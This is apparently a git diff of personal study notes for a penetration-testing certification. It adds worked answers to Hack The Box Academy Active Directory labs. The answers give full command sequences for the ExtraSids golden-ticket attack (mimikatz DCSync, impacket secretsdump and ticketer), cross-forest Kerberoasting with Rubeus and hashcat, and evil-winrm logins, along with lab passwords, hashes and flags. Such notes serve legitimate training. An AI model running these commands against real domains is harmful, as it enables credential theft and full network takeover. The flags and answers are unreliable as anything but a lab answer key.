Duration | | | +| ------ | ---------------------------------------- | -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | -------- | ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | --- | +| 01 | Penetration Testing Process | [Penetration Testing Process](penetration-testing-process.md) | 6 hours | Introduction | | +| 02 | Network Enumeration with Nmap | [(Almost) all about nmap](nmap.md) | 7 hours | Reconnaissance, Enumeration & Attack Planning | | +| 03 | Footprinting | [Introduction to footprinting](footprinting.md)
[Infrastructure and web enumeration](information-gathering.md)
Some services: [FTP](21-ftp.md), [SMB](137-138-139-445-smb.md), [NFS](2049-nfs-network-file-system.md), [DNS](53-dns.md), [SMTP](25-565-587-simple-mail-tranfer-protocol-smtp.md), [IMAP/POP3](110-143-993-995-imap-pop3.md),[SNMP](161-162-snmp.md), [MySQL](3306-mariadb-mysql.md), [Oracle TNS](1521-oracle-transparent-network-substrate.md), [IPMI](623-1900-intelligent-platform-management-interface-ipmi.md), [SSH](22-ssh.md), [RSYNC](873-rsync.md), [R Services](512-513-514-remote-services.md), [RDP](3389-rdp.md), [WinRM](5985-5986-winrm-windows-remote-management.md), [WMI](135-windows-management-instrumentation-wmi.md) | 2 days | Reconnaissance, Enumeration & Attack Planning | | +| 04 | Information Gathering - Web Edition | [Information Gathering - Web Edition](information-gathering.md). With tools such as [Gobuster](gobuster.md), [ffuf](ffuf.md), [Burpsuite](burpsuite.md), [Wfuzz](wfuzz.md), [feroxbuster](feroxbuster.md), [OWASP WSTG-INFO-02](OWASP/WSTG-INFO-03.md), [OWASP WSTG-INFO-02](OWASP/WSTG-INFO-03.md), [Google Dorks](google-dorks.md) More tools for recon: [finalrecon](finalrecon.md) | 7 hours | Reconnaissance, Enumeration & Attack Planning | | +| 05 | Vulnerability Assessment | [Vulnerability Assessment](vulnerability-assessment.md):
[Nessus](nessus.md), [Openvas](openvas.md) | 2 hours | Reconnaissance, Enumeration & Attack Planning | | +| 06 | File Transfer techniques | File Transfer Techniques:
[Linux](transferring-files-techniques-linux.md), [Windows](transferring-files-techniques-windows.md), [Code- netcat python php and others](transferring-files-techniques-code.md), [Bypassing file upload restrictions](webexploitation/arbitrary-file-upload.md), [File encryption](file-encryption.md), [Evading techniques when transferring files](transferring-files-evading-detection.md), [LOLbas Living off the land binaries](lolbins-lolbas-gtfobins.md) | 3 hours | Reconnaissance, Enumeration & Attack Planning | | +| 07 | Shells & Payloads | [Bind shells](bind-shells.md), [Reverse shells](reverse-shells.md), [Spawn a shell](spawn-a-shell.md), [Web shells](web-shells.md) ([Laudanum](laudanum.md) and [nishang](nishang.md)), [Windows footprinting](windows-footprinting.md), | 2 days | Reconnaissance, Enumeration & Attack Planning | | +| 08 | Using the Metasploit Framework | [Metasploit](metasploit.md), [Msfvenom](msfvenom.md) | 5 hours | Reconnaissance, Enumeration & Attack Planning | | +| 09 | Password Attacks | [Password attacks](webexploitation/password-attacks.md) | 8 hours | Exploitation & Lateral Movement | | +| 10 | Attacking Common Services | Common services: [FTP](21-ftp.md)
[SMB](137-138-139-445-smb.md) (tools: [smbclient](smbclient.md), [smbmap](smbmap.md), [rpcclient](rpcclient.md), [Samba Suite](samba-suite.md), [crackmapexec](crackmapexec.md), [impacket-smbexec](impacket-smbexec.md), [impacket-psexec](impacket-psexec.md)), Databases ([MySQL](mysql.md) and [Attacking MySQL](3306-mariadb-mysql.md), [MSSQL](mssql.md) and [Atacking MSSQL](1433-mssql.md), [log4j](log4j.md), [RDP](3389-rdp.md), [DNS](53-dns.md), [SMTP](25-565-587-simple-mail-tranfer-protocol-smtp.md), [IMAP/POP protocols](110-143-993-995-imap-pop3.md), [postfix](postfix.md), [swaks](swaks.md)
| 8 hours | Exploitation & Lateral Movement.
Machines:
- [Rabbit](https://www.youtube.com/watch?v=5nnJq_IWJog)
-  [SneakyMailer](https://0xdf.gitlab.io/2020/11/28/htb-sneakymailer.html)
- [Reel](https://0xdf.gitlab.io/2018/11/10/htb-reel.html) | | +| 11 | Pivoting, Tunneling, and Port Forwarding | [Pivoting, Tunneling, and Port Forwarding](pivoting-tunneling-portforwarding.md) | 2 days | Exploitation & Lateral Movement.
Machines:
- [Enterprise](https://app.hackthebox.com/machines/Enterprise) [IPPSec Walkthrough](https://youtube.com/watch?v=NWVJ2b0D1r8&t=2400)
- [Inception](https://app.hackthebox.com/machines/Inception) [IPPSec Walkthrough](https://youtube.com/watch?v=J2I-5xPgyXk&t=2330)
- [Reddish](https://app.hackthebox.com/machines/Reddish) [IPPSec Walkthrough](https://youtube.com/watch?v=Yp4oxoQIBAM&t=2466) | | +| 12 | Active Directory Enumeration & Attacks | [Active Directory](active-directory.md)

**From Linux:**
- [Enumeration](active-directory-from-linux-enumeration.md),
- [Attacks](active-directory-from-linux-attacks),
- [Lateral Movements](active-directory-from-linux-lateral-movement.md),
- [Privilege Escalation](active-directory-from-linux-privilege-escalation.md).

**From Windows:**
- [Enumeration](active-directory-from-windows-enumeration.md),
- [Attacks](active-directory-from-windows-attacks.md),
- [Privilege Escalation](active-directory-from-windows-privilege-escalation.md).

**Tools:**
- [Powershell](powershell.md),
- [Active Directory powershell Module](activedirectory-powershell-module.md),
- [Enumeration with LDAP queries](389-636-ldap.md)
- [PowerView.ps1 from PowerSploit project (powershell)](powerview.md).
- [The ActiveDirectory PowerShell module (powershell)](activedirectory-powershell-module.md).
- [BloodHound (C# and PowerShell Collectors)](bloodhound.md).
- [SharpView (C#)](sharpview.md).
- [kerbrute](kerbrute.md).
- [Crackmapexec](crackmapexec.md).
- [enum4linux](enum4linux.md). | 7 days | Exploitation & Lateral Movement | | +| 13 | Using Web Proxies | [Proxies](proxies.md): [burpsuite](burpsuite.md), [zap-proxy](owasp-zap.md), [proxychains](proxychains.md) | 8 hours | Web Exploitation | | +| 14 | Attacking Web Applications with Ffuf | [ffuf](ffuf.md) | 5 hours | Web Exploitation | | +| 15 | Login Brute Forcing | | 6 hours | Web Exploitation | | +| 16 | SQL Injection Fundamentals | | 8 hours | Web Exploitation | | +| 17 | SQLMap Essentials | | 8 hours | Web Exploitation | | +| 18 | Cross-Site Scripting (XSS) | [XSS](webexploitation/cross-site-scripting-xss.md) | 6 hours | Web Exploitation | | +| 19 | File Inclusion | | 8 hours | Web Exploitation | | +| 20 | File Upload Attacks | | 8 hours | Web Exploitation | | +| 21 | Command Injections | | 6 hours | Web Exploitation | | +| 22 | Web Attacks | [Web exploitation](webexploitation/index.md) | 2 days | Web Exploitation | | +| 23 | Attacking Common Applications | | 4 days | Web Exploitation | | +| 24 | Linux Privilege Escalation | | 8 hours | Post-Exploitation | | +| 25 | Windows Privilege Escalation | | 4 days | Post-Exploitation | | +| 26 | Documentation & Reporting | | 2 days | Reporting & Capstone | | +| 27 | Attacking Enterprise Networks | | 2 days | Reporting & Capstone | | ## Practicing Steps diff --git a/docs/cpts-labs.md b/docs/cpts-labs.md index d25b42f4a..82dd2976c 100644 --- a/docs/cpts-labs.md +++ b/docs/cpts-labs.md @@ -3844,14 +3844,219 @@ Results: Pass@word ### Why So Trusting? -Question +**RDP to  with user "htb-student" and password "Academy_student_AD!". What is the child domain of INLANEFREIGHT.LOCAL? (format: FQDN, i.e., DEV.ACME.LOCAL)** +```powershell +Import-Module activedirectory +Get-ADTrust -Filter * ``` +Results: LOGISTICS.INLANEFREIGHT.LOCAL, + +**What domain does the INLANEFREIGHT.LOCAL domain have a forest transitive trust with?** + +```powershell +# Same as above +Import-Module activedirectory +Get-ADTrust -Filter * ``` -Results: +Results: FREIGHTLOGISTICS.LOCAL + +**What direction is this trust?** + +Results: Bidirectional + + +**RDP to  with user "htb-student_adm" and password "HTB_@cademy_stdnt_admin!". What is the SID of the child domain?** + +```powershell +# As we are already in the child domain: +Import-Module .\PowerView.ps1 +Get-DomainSID +``` + +Results: S-1-5-21-2806153819-209893948-922872689 + + + **What is the SID of the Enterprise Admins group in the root domain?** + +```powershell +Get-DomainGroup -Domain INLANEFREIGHT.LOCAL -Identity "Enterprise Admins" | select distinguishedname,objectsid + +``` + +Results: S-1-5-21-3842939050-3880317879-2865463114-519 + + +**Perform the ExtraSids attack to compromise the parent domain. Submit the contents of the flag.txt file located in the c:\ExtraSids folder on the ACADEMY-EA-DC01.INLANEFREIGHT.LOCAL domain controller in the parent domain.** + +``` +# The complete attack would require getting the golden tickets. +# Step 1: get SID of the Child domain +Import-Module .\PowerView.ps1 +Get-DomainSID +# Result: S-1-5-21-2806153819-209893948-922872689 + + +# Step 2: get KRBTGT hash for the child domain +# Go to mimikatz.exe file in the explorer and execute as admin +lsadump::dcsync /user:$domain\$user +# Result: `9d765b482771505cbe97411065964d5f`. + +# Step 3: getting the name of a target user in the child domain (does not need to exist!) +# Result: hacker + +# Step 4: getting the FQDN of the child domain. +# Listed above in mimikatz output +# Result: `LOGISTICS.INLANEFREIGHT.LOCAL` + +# Step 5: getting the SID of the Enterprise Admins group of the root domain +# Way #1: +Get-DomainGroup -Domain INLANEFREIGHT.LOCAL -Identity "Enterprise Admins" | select distinguishedname,objectsid +# Way #2: +Get-ADGroup -Identity "Enterprise Admins" -Server "INLANEFREIGHT.LOCAL" +# Result: `S-1-5-21-3842939050-3880317879-2865463114-519` + +# Step 6: the attack +# Generate a golden ticket: +kerberos::golden /user:hacker /domain:LOGISTICS.INLANEFREIGHT.LOCAL /sid:S-1-5-21-2806153819-209893948-922872689 /krbtgt:9d765b482771505cbe97411065964d5f /sids:S-1-5-21-3842939050-3880317879-2865463114-519 /ptt +# Read the flag (make sure that the ticket has been created with klist) +cat \\academy-ea-dc01.inlanefreight.local\c$\ExtraSids\flag.txt +``` + +Results: f@ll1ng_l1k3_d0m1no3$ + + +**SSH to with user "htb-student" and password "HTB_@cademy_stdnt!". Perform the ExtraSids attack to compromise the parent domain from the Linux attack host. After compromising the parent domain obtain the NTLM hash for the Domain Admin user bross. Submit this hash as your answer.** + +``` +#### Step 1: getting the KRBTGT hash for the child domain +secretsdump.py $targetedDomain/$UserWithAdminPriv@$TargetedIP -just-dc-user $NetbiosNameofDomain/krbtgt + +# Example: +# secretsdump.py logistics.inlanefreight.local/htb-student_adm@172.16.5.240 -just-dc-user LOGISTICS/krbtgt +# Enter password: HTB_@cademy_stdnt_admin! +# Results: 9d765b482771505cbe97411065964d5f +#### + +#### Step 2: getting the SID for the child domain. Obtain the SID for the domain and the RIDs for each user and group and filter out by Domain SID +lookupsid.py $targetedDomain/$UserWithAdminPriv@TargetedIP | grep "Domain SID" +# Example: +# lookupsid.py logistics.inlanefreight.local/htb-student_adm@172.16.5.240 | grep "Domain SID" +# Enter password: HTB_@cademy_stdnt_admin! +# Results: S-1-5-21-2806153819-209893948-922872689 +#### + +#### Step 3: getting the name of a target user in the child domain (does not need to exist!) +hacker +#### + +#### Step 4: getting the FQDN of the child domain. +logistics.inlanefreight.local +#### + +#### Step 5: getting the SID of the Enterprise Admins group of the root domain +lookupsid.py $targetedDomain/$UserWithAdminPriv@$DomainControllerIP | grep "Enterprise Admins" +# Example: +# lookupsid.py logistics.inlanefreight.local/htb-student_adm@172.16.5.5 | grep "Enterprise Admins" +# Enter password: HTB_@cademy_stdnt_admin! +# Results: 519: INLANEFREIGHT\Enterprise Admins (SidTypeGroup) +#### + +#### Step 6: Generate a golden ticket +ticketer.py -nthash $KRBTGThashOfChildDomain -domain $targetedDomain -domain-sid $sidDomain -extra-sid $SIDofEnterpriseAdminGroup $madeupUserName +# Example: +# ticketer.py -nthash 9d765b482771505cbe97411065964d5f -domain LOGISTICS.INLANEFREIGHT.LOCAL -domain-sid S-1-5-21-2806153819-209893948-922872689 -extra-sid S-1-5-21-3842939050-3880317879-2865463114-519 hacker + +# The ticket will be saved down to our system as a credential cache (ccache) file, which is a file used to hold Kerberos credentials: +[*] Saving ticket in hacker.ccache + +# Setting the KRB5CCNAME environment variable tells the system to use this file for Kerberos authentication attempts. +export KRB5CCNAME=hacker.ccache +#### + +#### Step 7: Accessing another user on domain +# With one user, we will request the NTLM hash for another user +secretsdump.py $ControlledUsername@$hostnameController.$Parentdomain -k -no-pass -just-dc-ntlm -just-dc-user $targetUsername +# Example: +# secretsdump.py hacker@academy-ea-dc01.inlanefreight.local -k -no-pass -just-dc-ntlm -just-dc-user bross + +``` + +Results: 49a074a39dd0651f647e765c2cc794c7 + +### Breaking Down Boundaries + + +**Perform a cross-forest Kerberoast attack and obtain the TGS for the mssqlsvc user. Crack the ticket and submit the account's cleartext password as your answer.** + +``` +#### Enumerating SPNs +Get-DomainUser -SPN -Domain $TargetDomain | select SamAccountName +# Example: +# Get-DomainUser -SPN -Domain FREIGHTLOGISTICS.LOCAL | select SamAccountName +# Results: mssqlsvc +###### + +#### Getting which groups is mssqlsvc member of +Get-DomainUser -Domain $TargetDomain -Identity $interestingUserSamAccountName | select samaccountname,memberof +# Example: +# Get-DomainUser -Domain FREIGHTLOGISTICS.LOCAL -Identity mssqlsvc | select samaccountname,memberof +# Results: CN=Domain Admins,CN=Users,DC=FREIGHTLOGISTICS,DC=LOCAL +###### + +#### Performing a Kerberoasting Attacking with Rubeus Using /domain Flag +.\Rubeus.exe kerberoast /domain:$TargetDomain /user:$interestingUserSamAccountName /nowrap +# Example: +# .\Rubeus.exe kerberoast /domain:FREIGHTLOGISTICS.LOCAL /user:mssqlsvc /nowrap +# Results: [the kerberos ticket] +#### + +#### Crack it +hashcat -m 13100 ticketTocrack /usr/share/wordlists/rockyou.txt +``` + +Results: 1logistics + + +**Kerberoast across the forest trust from the Linux attack host. Submit the name of another account with an SPN aside from MSSQLsvc.** + +``` +GetUserSPNs.py -target-domain $targetedDomain $OurDomain/$ourUserSamAccountName +# Example: +# GetUserSPNs.py -target-domain FREIGHTLOGISTICS.LOCAL INLANEFREIGHT.LOCAL/wley +# Enter password: transporter@4 +``` + +Results: sapsso + + +**Crack the TGS and submit the cleartext password as your answer.** + +``` +GetUserSPNs.py -request -target-domain $targetedDomain $OurDomain/$ourUserSamAccountName +# Example: +# GetUserSPNs.py -request -target-domain FREIGHTLOGISTICS.LOCAL INLANEFREIGHT.LOCAL/wley +# Enter password: transporter@4 + +# Cracking the sapsso TGS: +hashcat -m 13100 sapsso /usr/share/wordlists/rockyou.txt +``` + +Results: pabloPICASSO + + + +**Log in to the ACADEMY-EA-DC03.FREIGHTLOGISTICS.LOCAL Domain Controller using the Domain Admin account password submitted for question #2 and submit the contents of the flag.txt file on the Administrator desktop.** + +``` +evil-winrm -i 172.16.5.238 -u sapsso -p pabloPICASSO +cat c:\Users\Administrator\Desktop\flag.txt +``` + +Results: burn1ng_d0wn_th3_f0rest! Question @@ -3863,7 +4068,6 @@ Question Results: - ## [Using Web Proxies](https://academy.hackthebox.com/module/details/110) ### Intercepting Web Requests diff --git a/docs/img/blood02.png b/docs/img/blood02.png new file mode 100644 index 000000000..73261bd07 Binary files /dev/null and b/docs/img/blood02.png differ diff --git a/docs/img/blood03.png b/docs/img/blood03.png new file mode 100644 index 000000000..4ab8db8be Binary files /dev/null and b/docs/img/blood03.png differ diff --git a/docs/impacket-psexec.md b/docs/impacket-psexec.md index 6a5706921..bf125d118 100644 --- a/docs/impacket-psexec.md +++ b/docs/impacket-psexec.md @@ -9,7 +9,7 @@ tags: --- # Impacket PsExec -The PSExec service then creates a [named pipe](https://docs.microsoft.com/en-us/windows/win32/ipc/named-pipes) that can send commands to the system. Psexec.py is a clone of the Sysinternals psexec executable, but works slightly differently from the original. The tool creates a remote service by uploading a randomly-named executable to the `ADMIN$` share on the target host. It then registers the service via `RPC` and the `Windows Service Control Manager`. Once established, communication happens over a named pipe, providing an interactive remote shell as `SYSTEM` on the victim host. +The [PSExec service](https://github.com/SecureAuthCorp/impacket/blob/master/examples/psexec.py) then creates a [named pipe](https://docs.microsoft.com/en-us/windows/win32/ipc/named-pipes) that can send commands to the system. Psexec.py is a clone of the Sysinternals psexec executable, but works slightly differently from the original. The tool creates a remote service by uploading a randomly-named executable to the `ADMIN$` share on the target host. It then registers the service via `RPC` and the `Windows Service Control Manager`. Once established, communication happens over a named pipe, providing an interactive remote shell as `SYSTEM` on the victim host. ## Installation